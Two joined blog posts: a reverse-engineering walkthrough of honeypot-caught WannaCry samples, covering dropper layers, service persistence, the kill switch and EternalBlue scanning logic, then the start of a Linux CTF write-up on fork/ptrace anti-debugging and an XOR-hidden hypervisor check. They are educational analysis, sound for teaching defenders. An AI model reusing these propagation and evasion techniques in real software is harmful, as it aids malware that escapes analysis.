At that time I was working as an Information Security Officer and, together with my colleagues, especially the guys from the IT Infrastructure department, I worked hard to keep the entire Company perimeter safe. Luckily for us, we were not hit by the ransomware, but a lot of effort was spent explaining to the rest of the Company what had happened.

Flash forward to 2019

Since this January, I've been running my own Dionaea honeypot, which keeps catching a huge number of WannaCry samples. Just to give you some numbers: within two months, port 445 was hit almost half a million times and I was able to collect roughly 18,000 samples, at a rate of almost 300 samples per day.

WannaCry, two years later: a deep look into its code

WannaCry, two years later: a deep look into its code

As you can tell from the file size, all these samples are identical, and every one of them is a WannaCry sample, delivered straight to port 445 as a DLL.

WannaCry, two years later: a deep look into its code

Just to make a contribution to the WannaCry story, though small and useless, I thought it would be fun to analyze the internals of this malware as I wasn't able to do it back in the days. I will concentrate the analysis on its various layers and the most important parts of the code that make this malware unique.

Peeling the onion

A first look at one of these samples confirms that we're dealing with a malicious DLL, and its compilation timestamp is worth noting. Let's call it launcher.dll, after a string found inside the code.

WannaCry, two years later: a deep look into its code
WannaCry, two years later: a deep look into its code

Luckily for us, this sample is not packed. We can check its Import and Export Address Table to get an idea of what this sample is able to do.

WannaCry, two years later: a deep look into its code

Checking the imported APIs, we can easily assume that the malware uses something in its resource section and presumably creates a file and runs a process. DLL malware commonly exposes its functionality through its Export Address Table. Here we can see only one exported function, called PlayGame:

WannaCry, two years later: a deep look into its code

As noted above, the malware imports some specific APIs to manage its resource section, like FindResourceA and LoadResource. We can easily recognize the magic numbers of a Portable Executable file (a Windows executable) stored inside this section, and we can dump it with tools like ResourceHacker:

WannaCry, two years later: a deep look into its code
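Recognizing an embedded executable by its magic numbers can also be done programmatically. The following is a minimal sketch, assuming the usual PE layout: an MZ DOS header whose DWORD at offset 0x3C (e_lfanew) points to the PE\0\0 signature. The function name find_embedded_pe is hypothetical.

```python
import struct

def find_embedded_pe(blob: bytes):
    """Return the offset of the first plausible PE image in blob, or None."""
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            # e_lfanew: offset of the PE signature, relative to the MZ header
            (e_lfanew,) = struct.unpack_from("<I", blob, pos + 0x3C)
            sig = pos + e_lfanew
            if blob[sig:sig + 4] == b"PE\x00\x00":
                return pos
        pos = blob.find(b"MZ", pos + 1)
    return None
```

Checking the PE signature as well as the MZ bytes avoids false positives, since the two letters MZ alone can easily appear by chance in binary data.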

But before analyzing it, we need to get rid of some bytes in the header; we'll come back to these bytes later.

WannaCry, two years later: a deep look into its code

So now we can open it and check its sections, as we just did with the DLL. Interestingly, this newly dumped executable seems to be 7 years older than the first one: its compile timestamp is dated November 2010. Be aware, though, that this date can easily be faked.

WannaCry, two years later: a deep look into its code
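The compile timestamp shown by PE tools is just a 32-bit field in the COFF header, which is why it is so easy to fake. A minimal sketch of reading it by hand, assuming a well-formed PE image (the function name pe_compile_time is hypothetical):

```python
import struct
from datetime import datetime, timezone

def pe_compile_time(image: bytes) -> datetime:
    """Read TimeDateStamp from the COFF header of a PE image."""
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    # After the 4-byte signature: Machine (2 bytes), NumberOfSections (2 bytes),
    # then TimeDateStamp (4 bytes, seconds since the Unix epoch)
    (stamp,) = struct.unpack_from("<I", image, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)
```

Anyone who can edit those four bytes can set whatever date they like, so the value is a hint at best.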

We can get an idea of what its purpose is by checking out the imported libraries:

WannaCry, two years later: a deep look into its code

We have to expect much more complexity in this stage than in the DLL. We have a bunch of standard libraries like KERNEL32.dll and WININET.dll, plus iphlpapi.dll. This DLL was unknown to me, so I looked it up on MSDN:

Purpose
The Internet Protocol Helper (IP Helper) API enables the retrieval and modification of network configuration settings for the local computer.
The IP Helper API is applicable in any computing environment where programmatically manipulating network and TCP/IP configuration is useful. Typical applications include IP routing protocols and Simple Network Management Protocol (SNMP) agents.

WannaCry, two years later: a deep look into its code

A quick look suggests that this executable works with the Windows services configuration, manages files and resources, and also has network capabilities:

WannaCry, two years later: a deep look into its code

The Plan

My plan is to take a deep look inside the various stages that the malware extracts during its execution, analyzing its code and how it interacts with internal Windows subsystems.

For this reason, we're now stepping back to analyze and understand how the DLL extracts this executable in the first place. Then we'll look inside the debugger to see how things happen in real time, and finally we'll analyze and try to understand what this executable does once it infects the system.

Analysis of the first layer: launcher.dll

The purpose of this DLL is exactly what we supposed thanks to the analysis of the imported libraries. The only exported function PlayGame is easily disassembled by IDAPro.

WannaCry, two years later: a deep look into its code

The first call to sprintf composes the Dest string as C:\WINDOWS\mssecsvc.exe. Then it calls two functions: sub_10001016 extracts, from the resource section, the executable we dumped before and saves it into a new file named after the Dest string; after that, sub_100010AB runs the file. Notice that we have just gained our first host-based indicator for detecting this malware: C:\WINDOWS\MSSECSVC.EXE.

Function sub_10001016 aka ExtractAndCreate

To make this function easier to read and understand, we can rename it ExtractAndCreate and split it into two parts: the extract part and the create-file part.

WannaCry, two years later: a deep look into its code
Disassembled extract part

During this phase, the malware uses four API calls, all fully documented on MSDN.

  • FindResourceA: Determines the location of a resource with the specified type and name in the specified module.
  • LoadResource: Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.
  • LockResource: Retrieves a pointer to the specified resource in memory.
  • SizeofResource: Retrieves the size, in bytes, of the specified resource.

That being said, we can now analyze these four simple blocks of code step by step. The first function prototype is:

HRSRC FindResourceA(
  HMODULE hModule,
  LPCSTR  lpName,
  LPCSTR  lpType
);

We have three function parameters that, as per calling convention, must be pushed in reverse order, so:

push    offset Type ; "W"
push    65h ; lpName
push    hModule ; hModule
call    ds:FindResourceA

The hModule parameter is populated inside the DllMain function and is equal to the hinstDLL variable.

WannaCry, two years later: a deep look into its code

hinstDLL: A handle to the DLL module. The value is the base address of the DLL. The HINSTANCE of a DLL is the same as the HMODULE of the DLL, so hinstDLL can be used in calls to functions that require a module handle.

lpName: The name of the resource. In this case, the name is 0x65, or 101 in decimal. This is confirmed by analyzing the DLL with ResourceHacker:

WannaCry, two years later: a deep look into its code

lpType: The resource type. It can also be seen in the screenshot above.

From MSDN: If the function succeeds, the return value is a handle to the specified resource's information block. To obtain a handle to the resource, pass this handle to the LoadResource function. If the function fails, the return value is NULL.

Coming back to the disassembly, this handle is returned in EAX and then moved into EDI, where it is tested to check whether it's null. If it's not, the handle is pushed, as the second argument, to the next API call, LoadResource. Quoting MSDN: it retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory. It also suggests: "...to obtain a pointer to the first byte of the resource data, call the LockResource function; to obtain the size of the resource, call SizeofResource".

HGLOBAL WINAPI LoadResource(
  _In_opt_ HMODULE hModule,
  _In_     HRSRC   hResInfo
);

hModule: A handle to the module whose executable file contains the resource.

hResInfo: A handle to the resource to be loaded.

The same approach applies to the other two API calls: LockResource and SizeofResource. The interesting thing to note here is that the return value of this last call, stored in the EAX register as 500000, won't be used at all:

WannaCry, two years later: a deep look into its code

So now, looking in the debugger, we have:

  • EAX = 500000
  • ESI = 10004060

The ESI register contains the pointer to the memory region of the resource section that holds the executable itself. You can recognize it thanks to the MZ header in the memory dump. Remember the 4 bytes that we removed with a hex editor before? According to MSDN, this DWORD is the actual size of the raw data inside the resource section of the binary itself. So this value, 0x0038D000, is moved into EBX and then pushed as nNumberOfBytesToWrite to the WriteFile function. Before that comes a pretty standard call: CreateFileA creates a file with specific attributes. For the dwFlagsAndAttributes parameter, according to MSDN, a value of 0x4 stands for: "The file is part of or used exclusively by an operating system".

WannaCry, two years later: a deep look into its code

After the call to WriteFile, we have our executable saved and ready to run. The interesting parameters for this call are:

  • lpBuffer: equal to ESI, the value returned by the call to LockResource; it's a pointer to the buffer to write into the file. Basically, it's a pointer to the binary inside the resource section.
  • nNumberOfBytesToWrite: as we said earlier, this parameter is the DWORD inside the resource header that ESI points to. Its value represents the size of the binary data.
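The manual step of stripping the leading bytes with a hex editor can be sketched in a few lines. This assumes the layout described above: a little-endian DWORD with the payload size, followed directly by the embedded executable. The function name split_resource is hypothetical.

```python
import struct

def split_resource(resource: bytes) -> bytes:
    """Return the payload that follows the 4-byte size prefix."""
    (size,) = struct.unpack_from("<I", resource, 0)
    payload = resource[4:4 + size]
    if len(payload) != size:
        raise ValueError("resource is shorter than its size prefix claims")
    return payload
```

With the sample analyzed here, the prefix bytes 00 D0 38 00 decode to 0x0038D000, which matches the value seen in EBX.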

So now, we can enable a breakpoint right after the WriteFile call and get the freshly created executable.

WannaCry, two years later: a deep look into its code

Function sub_100010AB aka RunTheFile

Here we're dealing with a very simple API call to CreateProcessA, nothing fancy to add. I'd prefer not to dig into all its parameters; they're fully documented on MSDN.

WannaCry, two years later: a deep look into its code

Conclusion after the first layer

What I want to show here is my own study process: be aware that it can sometimes be very, very time-consuming, but it gives me a broad, complete and deep look inside Windows internals and how malware uses them. As a novice, this process helped me a lot.

Analysis of the second layer: mssecsvc.exe

This one differs from the DLL file. As we noted initially, this executable is way more complex: we'll deal with various libraries and functionalities. But it all starts with a (Win)main function, right?

WannaCry, two years later: a deep look into its code

Do you remember the kill-switch? Do you remember the story behind? Give it a read, it's very interesting.

In general terms, the main function of a Windows program is named WinMain; this is the first function called when the program starts. We see a very strange URL inside this code. The exact string is http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com and it is referenced through the EDI register. After that, the WinINet subsystem is initialized with a call to InternetOpenA, which returns a valid handle that the application passes to subsequent WinINet functions. Next, there's a call to InternetOpenUrlA, which opens a resource specified by a complete FTP or HTTP URL. After that, the handle is closed and a new function is called: sub_408090, which we'll name ServiceStuff:

WannaCry, two years later: a deep look into its code

In the first block of code, according to MSDN: GetModuleFileNameA retrieves the fully qualified path for the file that contains the specified module. The module must have been loaded by the current process, first parameter hModule is the handle to the loaded module whose path is being requested. If this parameter is NULL, GetModuleFileNameA retrieves the path of the executable file of the current process. Here the value is set to NULL, so it retrieves the name of the executable itself:

WannaCry, two years later: a deep look into its code

We then find a check on the number of arguments: if there are arguments, the TRUE path is taken. Because, in our case, we're debugging without any argument, the FALSE path is taken and a new function, sub_407F20, is called. This is a simple function that calls two others, so let's call it FunctionCaller:

WannaCry, two years later: a deep look into its code

Simply enough, sub_407C40 creates a new service and then starts it, so we name it CreateAndStartService. The service runs with the command line mssecsvc.exe -m security, with the display name "Microsoft Security Center (2.0) Service" and the service name "mssecsvc2.0".

WannaCry, two years later: a deep look into its code

When we then move to sub_407CE0, things start to become fun. For the sake of simplicity, we'll analyze this function in four parts. The first part is easy because the malware dynamically resolves some APIs:

WannaCry, two years later: a deep look into its code

Nothing too complicated here: it uses GetProcAddress to populate some variables with the addresses of specific APIs, so it can call them in the following lines of code. After that, the second part handles the resource section, just as we saw in launcher.dll:

WannaCry, two years later: a deep look into its code

This is confirmed in the debugger:

WannaCry, two years later: a deep look into its code

The return value from LockResource, as we know, is the pointer to the resource data in the binary, and we can spot the MZ header in the memory dump. We then reach another interesting piece of code:

WannaCry, two years later: a deep look into its code

Two distinct strings, Dest and NewFileName, are created using the sprintf function. These two strings are further good host-based indicators:

Dest = C:\WINDOWS\tasksche.exe

NewFileName = C:\WINDOWS\qeriuwjhrf
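The host-based indicators collected so far (mssecsvc.exe, tasksche.exe and qeriuwjhrf under C:\WINDOWS) can be checked with a short script. This is only a sketch of the idea: the function name find_indicators is hypothetical, and the directory is passed as a parameter so the check can be pointed at a mounted disk image or a test folder.

```python
from pathlib import Path

# File names observed in the analysis above
INDICATORS = ("mssecsvc.exe", "tasksche.exe", "qeriuwjhrf")

def find_indicators(windows_dir):
    """Return the indicator file names found directly inside windows_dir."""
    wanted = {name.lower() for name in INDICATORS}
    root = Path(windows_dir)
    # Compare case-insensitively, as Windows file names are not case sensitive
    return sorted(p.name for p in root.iterdir()
                  if p.is_file() and p.name.lower() in wanted)
```

A legitimate file could in principle share one of these names, so a hit is a reason to look closer rather than a verdict.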

After that, the old tasksche.exe file is moved to the new qeriuwjhrf file and a new tasksche.exe is created. At this point I found myself lost in somewhat obscure code: I understood that WriteFile dumps the R resource into the newly created tasksche.exe, which is run at the end. What happens in the middle part remained in the dark for me.

WannaCry, two years later: a deep look into its code

In situations like this, I prefer to view the code inside the debugger, because watching it at runtime can help shed some light. Indeed, it seems that it builds the command line for the upcoming CreateProcessA call.

WannaCry, two years later: a deep look into its code

To recap: this function dumps its resource data into a new executable file named tasksche.exe, after moving any previous tasksche.exe to another file named qeriuwjhrf, and then runs tasksche.exe /i.

Stepping back to the ServiceStuff function, there's the other path to analyze: when the arguments "-m security" are present, it enters service mode. After its initialization, it changes the service config:

WannaCry, two years later: a deep look into its code

According to MSDN, it changes the config so that failure actions occur if the service exits without entering a SERVICE_STOPPED state. After that, it executes its ServiceFunction:

WannaCry, two years later: a deep look into its code

This function sets up the handles and starts exploiting the MS17-010 vulnerability on the reachable networks. Note that it exits after 24 hours. Here, I renamed this function ExecuteEternalBlue.

WannaCry, two years later: a deep look into its code

This call starts a number of events that make the infection happen. First, the Winsock subsystem is initialized and a CryptoContext is generated:

WannaCry, two years later: a deep look into its code

Next, the malware loads a DLL into memory - the very same launcher.dll we analyzed before - and then runs it. The network attacks happen inside two new threads. This flow can be easily observed if we decompile this function:

WannaCry, two years later: a deep look into its code

The first thread, involving the function sub_407720, enumerates the local network adapters and generates IP addresses belonging to those networks. For every IP, it tries to connect to port 445 and, if successful, launches the attack. The second thread, involving function sub_407840, runs 128 times with a 2-second (hex 7D0 milliseconds) delay between each run. It generates a random IP address and tries to connect to port 445; if the connection is successful, the malware launches the EternalBlue attack. It's a pretty big chunk of code, but one interesting block is this:

WannaCry, two years later: a deep look into its code

Basically, with the random IP placed into the Dest string and converted into the proper format, the malware calls sub_407480, aka CreateSocketAndConnect, to attempt a connection to port 445. If the connection is successful, the real attack is launched within the function sub_407540, aka SMBAttack.
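To get a feeling for the address space the first thread walks through, the set of addresses belonging to an adapter's network can be listed with Python's ipaddress module. This is an analyst-side sketch only: it performs no network activity, the function name local_targets and the example interface are made up, and it is not a reconstruction of sub_407720.

```python
import ipaddress

SMB_PORT = 445           # port probed by both threads
RETRY_DELAY_MS = 0x7D0   # delay between runs of the second thread

def local_targets(interface_cidr):
    """List the host addresses of the network an interface belongs to."""
    iface = ipaddress.ip_interface(interface_cidr)
    return [str(host) for host in iface.network.hosts()]
```

For a made-up adapter configured as 192.168.1.10/29, this yields the six usable addresses from 192.168.1.9 to 192.168.1.14, and 0x7D0 converts to 2000, i.e. the 2-second delay mentioned above.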

Conclusion after the second layer

So far, we have a DLL, launcher.dll, that extracts and runs a binary stored inside its resource section, mssecsvc.exe. The very first time it runs, a new service is created to achieve persistence; after that, it scans the networks (local and random remote ones), launching the EternalBlue exploit against port 445. In its stand-alone version, it dumps another binary from its resource section and runs it. What's the purpose of this third binary? Let's take a look.
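The control flow of mssecsvc.exe described in this section can be summarized as a small decision function. Nothing is executed here: the function only returns the names of the steps, and the reachability check is passed in as a callable. One assumption goes beyond the disassembly shown above: that the program exits when the strange URL can be opened, which is the widely reported kill-switch behaviour. The function name mssecsvc_flow is hypothetical.

```python
KILL_SWITCH_URL = "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"

def mssecsvc_flow(argv, url_reachable):
    """Return the steps mssecsvc.exe would take, in order (nothing is run)."""
    # Assumed kill switch: stop if the URL can be opened
    if url_reachable(KILL_SWITCH_URL):
        return ["exit"]
    # No arguments: stand-alone mode (the FALSE path, FunctionCaller)
    if len(argv) < 2:
        return ["CreateAndStartService",
                "drop tasksche.exe",
                "run tasksche.exe /i"]
    # With arguments (-m security): service mode
    return ["change service config", "ExecuteEternalBlue"]
```

For example, mssecsvc_flow(["mssecsvc.exe", "-m", "security"], lambda url: False) returns the two service-mode steps.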

Analysis of the third layer: tasksche.exe

Remember that this executable comes from the resource section of the previous file, mssecsvc.exe, which, in its stand-alone version, locates its resource section and writes it to disk, creating tasksche.exe. When tasksche.exe starts, it first generates a random string based on the computer name, then checks its command line arguments, in particular whether /i is among them. We now have two branches to analyze:

  • If there's an /i argument: it creates specific directories and copies itself there, like C:\ProgramData\somerandomstring\tasksche.exe, and runs from there.
WannaCry, two years later: a deep look into its code
  • If there's no /i argument: it locates its resource section, named XIA, and extracts it onto disk. What's interesting to note here is that this resource is a compressed, password-protected archive. Luckily for us, the password is hardcoded in clear text.
WannaCry, two years later: a deep look into its code

Let's give a look inside the archive knowing the password: [email protected]

WannaCry, two years later: a deep look into its code

We can recognize the magic numbers for a ZIP file that we can dump directly and extract.

WannaCry, two years later: a deep look into its code
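Spotting the ZIP magic numbers and extracting the archive can also be scripted. The sketch below assumes the archive starts at the first PK\x03\x04 signature found in the dumped resource and that nothing follows the archive; the function names carve_zip and read_members are hypothetical. Python's zipfile module can decrypt the legacy ZIP encryption when given the password as bytes.

```python
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"  # local file header signature

def carve_zip(blob: bytes):
    """Return blob from the first ZIP local file header on, or None."""
    start = blob.find(ZIP_MAGIC)
    return None if start < 0 else blob[start:]

def read_members(zip_bytes: bytes, password: bytes = None) -> dict:
    """Map each member name to its extracted content."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        return {name: archive.read(name, pwd=password)
                for name in archive.namelist()}
```

For the real resource, the hardcoded password would be passed as the password argument.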

b.wnry is the bitmap image of the ransomware: basically, what you see as wallpaper when the computer is infected.

WannaCry, two years later: a deep look into its code

c.wnry is the configuration file in clear text, we can see some onion servers and the archive containing the TOR browser.

WannaCry, two years later: a deep look into its code

r.wnry contains a text ransom note.

Inside the msg folder there are some localized ransom notes:

WannaCry, two years later: a deep look into its code

Conclusion after the third layer

This new executable seems pretty interesting because, basically, it manages all the crypto actions of the ransomware. I won't go into this analysis because it's beyond my current skills and also because there are plenty of resources available on the internet from amazing guys who are way better than me. For example, this technical analysis by FireEye was published only a few days after the outbreak and is complete, deep and detailed. I used it a lot to better understand many pieces of obscure code.

Conclusion

I have learned a lot from this research: I learned how malware interacts with its resource section to hide, dump and create files; how it interacts with the Windows service manager; how it actually loads DLLs in memory; how it scans networks; and how EternalBlue actually works. Also, having such complete and detailed technical analyses of this very specific malware available helped me not to lose direction when I went too deep into the assembly code. It was great fun, and I hope this research will be as helpful to someone else as it was to me.

An extensive step by step reverse engineering analysis of a Linux CTF binary

25 March 2019 at 09:00
By: Kartone

...or, in other words, when failing to reverse a CTF binary makes you lose that job.

During a past job interview, I was tasked with reversing four Linux binaries of increasing difficulty as proof of my ability in the reverse engineering field. I solved the first two in about an hour, and the third one required an entire day of work, but sadly I was not able to solve the last one. I don't know if I wasn't selected because of this failure, but it proved one thing for sure: I wasn't prepared enough or, at least, not as much as I wanted. Flash forward: I successfully ended up with another job, but that challenge stayed there, like a small needle in my head. During the following months, I studied and practiced a lot, mainly in the firmware reversing field, and every now and then I tried to solve that sneaky challenge.

This is my extensive and detailed description of my failures and successes.

Important note

Please note that, as this analysis started some months ago and this post was revised a huge number of times, you won't find the same memory addresses or function names across the screenshots and code snippets.

Running the binary

What are we dealing with?

[email protected]:/opt/ctf# file original 
original: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d0d5b9a34a4fe4c52a3939c75bd71cfa0dc23825, stripped
[email protected]:/opt/ctf# checksec -f ./original
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   No Symbols       No	0		2	./original

A standard, stripped, Linux 32bit binary with no fancy protection active. We're not aiming to exploit it but only to find the flag. A picture is worth a thousand words, they say:

[email protected]:/opt/ctf# ./original
[-] No vm please ;)
[email protected]:/opt/ctf# ./original AAAA
[-] No vm please ;)
[email protected]:/opt/ctf# ./original -h
[-] No vm please ;)
[email protected]:/opt/ctf# ./original AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[-] No vm please ;)
[email protected]:/opt/ctf# 

It doesn't run inside a virtual machine and I definitely don't want to build a physical linux box. Would you tell me some of your internals, please?

[email protected]:/opt/ctf# strace ./original 
execve("./original", ["./original"], 0x7fff2a7dc4f0 /* 48 vars */) = 0
strace: [ Process PID=121645 runs in 32 bit mode. ]
brk(NULL)                               = 0x572fb000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7f05000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=133840, ...}) = 0
mmap2(NULL, 133840, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf7ee4000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\254\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1947056, ...}) = 0
mmap2(NULL, 1955712, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7d06000
mprotect(0xf7d1f000, 1830912, PROT_NONE) = 0
mmap2(0xf7d1f000, 1368064, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x19000) = 0xf7d1f000
mmap2(0xf7e6d000, 458752, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x167000) = 0xf7e6d000
mmap2(0xf7ede000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d7000) = 0xf7ede000
mmap2(0xf7ee1000, 10112, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf7ee1000
close(3)                                = 0
set_thread_area({entry_number=-1, base_addr=0xf7f060c0, limit=0x0fffff, seg_32bit=1, contents=0, read_exec_only=0, limit_in_pages=1, seg_not_present=0, useable=1}) = 0 (entry_number=12)
mprotect(0xf7ede000, 8192, PROT_READ)   = 0
mprotect(0x565b8000, 4096, PROT_READ)   = 0
mprotect(0xf7f34000, 4096, PROT_READ)   = 0
munmap(0xf7ee4000, 133840)              = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xf7f06128) = 121646
waitpid(121646, [{WIFEXITED(s) && WEXITSTATUS(s) == 1}], 0) = 121646
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=121646, si_uid=0, si_status=1, si_utime=0, si_stime=0} ---
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x1), ...}) = 0
brk(NULL)                               = 0x572fb000
brk(0x5731c000)                         = 0x5731c000
brk(0x5731d000)                         = 0x5731d000
write(1, "[-] You fool, nobody debugs me!!"..., 34[-] You fool, nobody debugs me!!!
) = 34
write(1, "1\n", 21
)                      = 2
exit_group(-1)                          = ?
+++ exited with 255 +++

"You fool, nobody debugs me!!!"

Great: after a couple of runs, we know that there is some anti-VM and anti-debug code in place. Let's look inside.

First thing, I searched and found the strings pretty quickly, and I noticed also two other interesting strings: one for a fail, one for a success.

An extensive step by step reverse engineering analysis of a Linux CTF binary

Digging a little more, we can find where the strings are placed and where they're used from.

An extensive step by step reverse engineering analysis of a Linux CTF binary

It's clear that the subroutine placed at address 0x566429DC has something to do with them and with the anti-VM/anti-debug tricks.

Analyzing the anti-debug and anti-vm routine

Once I had identified where the strings involved in these anti-debug and anti-VM tricks are, it was easy to find the code and visualize the blocks in IDA. Please note that sub_566429DC is renamed here to AntiDebugAntiVM.

An extensive step by step reverse engineering analysis of a Linux CTF binary

This is the graph of the AntiDebugAntiVM function. In the first block of code, we can see the standard function prologue that sets up the stack frame. After that, there's a bunch of NOPs and a call to fork(). Let's understand the fork call: what's its purpose?

fork() creates a new process by duplicating the calling process. The new process, referred to as the child, is an exact duplicate of the calling process, referred to as the parent. On success, the PID of the child process is returned in the parent, and 0 is returned in the child. On failure, -1 is returned in the parent, no child process is created, and errno is set appropriately. (ref)

Basically, right after the fork call, its return value, held in the EAX register, is moved into a local variable that is compared with zero. The first branch is important: if the JNZ is taken, we're in the parent process, so we go down the right path. Vice versa, if it is not taken, we head left, into the child process.

Into the child process

If EAX is zero, or in other terms, we're into the child process, we can see a call to getppid()function that returns the process ID of the parent of the calling process. Β But the important call is the next one, the call to the ptrace() function. The standard definition of this function is:

The ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process (the "tracee"), and examine and change the tracee's memory and registers. It is primarily used to implement breakpoint debugging and system call tracing.

And is defined as:

long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);

In assembly, the call is built with these lines of code:

push    0             ; *data  
push    0             ; *addr  
push    [ebp+var_1C]  ; Parent PID
push    10h           ; request = PTRACE_ATTACH (0x10)
call    _ptrace

Basically, the child retrieves its parent's PID and tries to attach to the parent as a tracer [1]. If the attach succeeds, nobody else is tracing the parent: the child sleeps 5 seconds, detaches and exits with status 0 [2]. If the attach fails, which is the evidence that the parent is already being debugged, the child exits with status 1 [3]. Going up a level, if fork() returns -1, the function exits with status code 1 [5].

Into the parent process

If EAX is not zero, we're on the right path, so in the parent process. As you may remember, EAX holds the PID of the child. After the check against -1 in block [1], execution goes into block [2]. Here, the parent performs a call to waitpid():

push    0                     ; options
lea     eax, [ebp+stat_loc]
push    eax                   ; stat_loc
push    [ebp+pid]             ; child PID
call    _waitpid

The waitpid() system call is used to wait for state changes in a child of the calling process, and obtain information about the child whose state has changed. A state change is considered to be: the child terminated; the child was stopped by a signal; or the child was resumed by a signal. In the case of a terminated child, performing a wait allows the system to release the resources associated with the child; if a wait is not performed, then the terminated child remains in a "zombie" state. (ref)

On success, waitpid() returns the process ID of the child whose state has changed; on error, -1 is returned. What happens in the next blocks 2, 3, 4 and 5 is described in this answer I got on ReverseEngineering. There's no need to add anything more.

Anti-VM code

This is where things become fun and interesting. We can observe a bunch of mov instructions onto the stack, a loop and, inside of it, an interesting xor instruction: xor eax, 75h. The loop counter runs from 0 to 0x32 (50 in decimal) inclusive, so the loop processes 51 bytes: starting from [ebp+command], it XORs one byte at a time with the fixed value \x75. Pretty standard XOR decryption routine, right? We can try to replicate this routine in Python:

#!/usr/bin/env python3

# Encrypted command bytes, copied from the mov instructions that fill the stack
hexdata = "19061605005509551207100555523D0C051007031C061A07525509550107555811555255525509551600015558114F55581347"
binary = bytes.fromhex(hexdata)

def xor_bytes(data, key=0x75):
    # XOR every byte with the single-byte key used by the binary
    return bytes(b ^ key for b in data).decode("ascii")

xored = xor_bytes(binary)
print("Your decrypted string is: " + xored)
[email protected]:/opt/ctf# ./script.py 
Your decrypted string is: lscpu | grep 'Hypervisor' | tr -d ' ' | cut -d: -f2

Basically, it decrypts a shell command in memory and executes it via the following popen() call. The command uses lscpu to check whether the CPU information contains the string Hypervisor. This function looks pretty interesting:

The popen() function opens a process by creating a pipe, forking, and invoking the shell. Since a pipe is by definition unidirectional, the type argument may specify only reading or writing, not both; the resulting stream is correspondingly read-only or write-only. The command argument is a pointer to a null-terminated string containing a shell command line. This command is passed to /bin/sh using the -c flag; interpretation, if any, is performed by the shell. The type argument is a pointer to a null-terminated string which must contain either the letter 'r' for reading or the letter 'w' for writing. popen(): on success, returns a pointer to an open stream that can be used to read or write to the pipe; if the fork(2) or pipe(2) calls fail, or if the function cannot allocate memory, NULL is returned.

After the stream is opened, another library function, fgetc(), is called.

fgetc() reads the next character from stream and returns it as an unsigned char cast to an int, or EOF on end of file or error.

What happens is simple: it opens a stream in read-only mode and executes the command 'lscpu | grep 'Hypervisor' | tr -d ' ' | cut -d: -f2'. If the command prints something, meaning that grep matched, we're in a virtual machine: the binary prints the string [-] No vm please ;) and exits. If the stream cannot be opened or the command prints nothing, it closes the stream via fclose() and returns.
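The same check can be imitated in a few lines of Python. This is only a sketch of the logic, not the binary's code: os.popen stands in for popen() and reading a single character stands in for fgetc(). The helper name command_prints_anything is made up for this illustration.

```python
import os


def command_prints_anything(command: str) -> bool:
    """Run `command` through the shell and report whether it wrote at least one character."""
    # os.popen follows the same idea as C's popen(): a pipe plus a shell running the command.
    with os.popen(command, "r") as stream:
        # Reading one character mirrors the single fgetc() call in the binary.
        return stream.read(1) != ""


if __name__ == "__main__":
    # The decrypted command from the binary; the grep only prints when lscpu mentions a hypervisor.
    check = "lscpu | grep 'Hypervisor' | tr -d ' ' | cut -d: -f2"
    if command_prints_anything(check):
        print("hypervisor line found")
    else:
        print("no hypervisor line found")
```

Note that the result depends only on whether the pipeline prints anything at all, which is exactly what makes the check easy to fool.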

Everything becomes clear if we now look at the pseudo-code, with the important variables renamed according to their role.

int AntiDebugAntiVM()
{
  char command; // [esp+4h] [ebp-54h]
  char v2; // [esp+5h] [ebp-53h]
  char v3; // [esp+6h] [ebp-52h]
  char v4; // [esp+7h] [ebp-51h]
  char v5; // [esp+8h] [ebp-50h]
  char v6; // [esp+9h] [ebp-4Fh]
  char v7; // [esp+Ah] [ebp-4Eh]
